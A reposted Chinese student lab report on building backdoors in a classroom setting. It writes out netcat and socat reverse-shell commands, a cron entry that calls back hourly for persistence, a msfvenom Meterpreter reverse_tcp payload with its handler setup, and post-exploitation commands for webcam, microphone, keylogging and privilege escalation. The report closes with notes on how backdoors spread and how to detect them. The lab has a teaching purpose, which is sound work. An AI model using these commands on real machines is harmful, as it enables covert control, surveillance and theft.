Exp2后门原理与实践

一、简单后门

1、ncat、socat的基础操作

工具介绍:

netcat(nc、ncat)是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
socat:类似于Netcat的加强版。
以上两个工具均可以在老师课件主页的附件中下载++https://gitee.com/wildlinux/NetSec/attach_files++

Meterpreter:利用 Metaspolit 的 msfvenom 指令生成后门可执行文件。

操作内容:

1.1Windows与linux间获取Shell
1.1.1 Windows主机获取 Linux Shell
windows:

1、win主机查本机IP地址:ipconfig

1350877-20180329214137026-780165827.png

由上图可见IPV4的地址为192.168.43.102

2、利用netcat.exe程序监听端口:4330

1350877-20180329214513265-591942667.png

ps:我将解压好的ncat文件包和socat文件包放在了C:\Users\Mypc\Desktop\网络攻防实验二图片\ncat目录下,所以需要先cd到ncat目录下,然后输入ncat.exe -l -p 4330监听端口4330

kali:

1、使用nc 192.168.43.102 4330 -e /bin/sh指令反向连接Windows主机的4330端口:

1350877-20180329214837117-242155046.png

2、windows执行linux shell的指令

1350877-20180329214907154-469268915.png

此时,可以在cmd.exe下运行linux的指令

1.1.2Linux主机获取 Windows shell
linux:

1、查看kali的主机IP地址:ifconfig

1350877-20180329214924696-1386516357.png

上图可以看到kali的主机IP地址为192.168.29.129

2、输入nc -l -p 4330指令监听端口

1350877-20180329215000735-1095043065.png

windows:

1、在cmd窗口使用 ncat.exe -e cmd.exe 192.168.239.131 4305命令去连接Linux的4305端口。

2、Linux运行Windows shell

1.2Linux运行Windows shell

1.Windows输入指令ncat.exe -l 4330 监听

2.Linux输入指令nc 192.168.43.102 4305 连接win主机

3.双向传输字符串
1350877-20180329215108315-554737365.png

1.3 ncat定时启动

1、Windows输入指令ncat.exe -l -p 4330监听
1350877-20180329221029665-1351522951.png

2、Linux输入指令crontab -e
,选择一个文本编辑器打开,在最后一行添加代码:10 * * * * /bin/netcat 192.168.43.102 4330 -e /bin/sh
在每小时的10分运行ncat回连win主机
1350877-20180329221112240-116019790.png

3、时间一到就可以运行linux shell指令

1.4 socat 定时启动

1、在windows下依次打开控制面板-管理工具-任务计划,新建一个任务

1350877-20180329215130567-1243877665.png
1350877-20180329215200483-343508019.png

2、新建触发器
1350877-20180329215153248-791522568.png

3、新建操作

1350877-20180329215214532-277362639.png

其中添加参数为:tcp-listen:4330 exec:cmd.exe,pty,stderr

4、运行任务

1350877-20180329215226588-328134631.png

5、Linux输入指令 socat - tcp:192.168.43.102:4330
, windows主机IP、端口号,此时可以获取win的shell命令

1350877-20180329215249263-349615169.png

二、体验 MSF Meterpreter 功能

2.1利用msfvenom指令生成后门程序

1、在Linux主机输入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.129 LPORT=4330 -f exe > 20154330_backdoor.exe

此条指令意为生成一个.exe程序,名称为 20154330_backdoor,将来在windows上运行时会回连到Linux主机相应端口

1350877-20180329215853275-770430043.png

2、将生成文件拷贝到windows下(随意目录)

1350877-20180329215716033-2033303903.png

2.2进入控制台设置相关参数

1、linux输入指令msfconsole
1350877-20180329215436206-654398999.png

2.在msf>下输入命令use exploit/multi/handler

3.输入set payload windows/meterpreter/reverse_tcp
设置payload

4.输入指令set LHOST 192.168.29.129

5.输入指令set LPORT 4330

6.输入指令show options
1350877-20180329215505455-1482780198.png

2.3开始监听

1、Linux输入指令exploit
开始监听
1350877-20180329215524620-1193431210.png

2.windows主机双击后门木马程序执行

3.1输入指令record_mic录制一段音频

3.2输入指令webcam_snap拍摄照片

3.3输入指令screenshot截取屏幕

3.4输入指令keyscan_start记录击键内容,输入指令keyscan_dump获取击键记录

3.5输入指令getuid查看当前用户,输入指令getsystem提权

1350877-20180329215607130-1744257193.png
1350877-20180329215617729-971586205.png
1350877-20180329215625667-1917206403.png

三、问题

1.例举你能想到的一个后门进入到你系统中的可能方式?

从网络上下载非正版的软件安装包、压缩包
各种不明来历的信息,链接,还有一些小视频……
移动设备拷贝文件时携带

2.例举你知道的后门如何启动起来(win及linux)的方式?

后门程序与文件或程序绑定,打开文件或程序时,后门启动。
电脑开机时后门程序自动启动。

3.Meterpreter有哪些给你映像深刻的功能?

感觉它超级强大……每个功能都很让我印象深刻!开摄像头,屏幕截图,录音频……完全没有任何隐私,所以以后在软件的安装中要做到尽可能从正规渠道下载,对于一些不明来历的信息,链接不因好奇心而点击,减少系统被植入后门的危险。

4.如何发现自己有系统有没有被安装后门?

如果翻看任务管理器时,机器内存占用非常严重,关掉主要应用程序还是有占用,任务里有并不认识的exe程序,那很有可能就是被安装了后门。
使用杀毒软件,定时经常性的进行全盘查杀
下载文件进程的时候,设置防火墙

四、实验感想

本次实践主要是多种方法linux获取win的shell,winxp获取linux的shell。后门的简单学习,生成一个后门文件,安装在靶机中,控制靶机,就可以得到自己想要得到的信息。Meterpreter,功能很强大,通过实践,也意识到后门程序一旦被启动,那信息被盗取很容易。所以计算机没有绝对的安全,在使用时要避免打开一些不良的或者未知的文件。

转载于:https://www.cnblogs.com/zhangweiye20154330/p/8672737.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值